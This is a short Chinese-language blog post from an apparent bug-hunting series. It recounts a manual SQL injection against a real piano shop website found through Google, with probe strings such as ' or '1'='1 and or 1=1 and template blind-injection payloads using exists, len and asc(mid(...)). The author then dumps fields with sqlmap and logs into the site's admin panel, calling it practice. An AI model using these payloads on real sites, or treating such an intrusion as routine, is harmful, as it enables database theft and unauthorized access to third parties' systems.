【滲透實戰】日常挖洞第三期_對某琴行進行手工注入

●漏洞已提交
■重要細節全部打碼
■部分細節對外開放
■本次入侵不對網站數據庫進行任何更改
注:日常挖洞系列基本上是記錄平常遇到的非常普通的漏洞,毫無看點,僅僅記錄挖洞的經驗
日常記錄漏洞站點
google上找到一個琴行網站

判斷sql注入

注入單引號’
報錯"商品已下架"
網站後加上’ or ‘1’='1
報錯"商品已下架",並且不爆出具體錯誤
繼續更改
or 1=1
在這裏插入圖片描述
網頁正常返回並爆出該表下所有數據,看樣子是int型
在這裏插入圖片描述
●判斷:存在sql注入點

開始注入

因爲不返回具體信息,所以having 1=1的方法就報廢了
所以盲注檢測數據庫
and exists(select * from 表名)
這個方法判斷當前數據庫下是否有此表
and (select count(字段) from 表名)
判斷此表名下是否有某字段
and (select top 1 len (字段) from 表名)>數字
判斷該列的字段長度是否大於某個數
and (select top 1 asc (mid (字段,位數,1)) from 表名) >ascii(1~128)
判斷字段的ascii碼
比如and (select top 1 asc (mid (字段,位數,1)) from 表名) >96
如果返回正常,而97返回不正常那麼該字段的某位數的ascii碼爲97,查詢ascii碼錶,此字爲a
接着一個個猜就行,不過我可沒這耐心,我直接用sqlmap跑出字段了
在這裏插入圖片描述

成功登入網站管理界面
此處入侵沒有什麼技術含量,純粹練練手感
在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章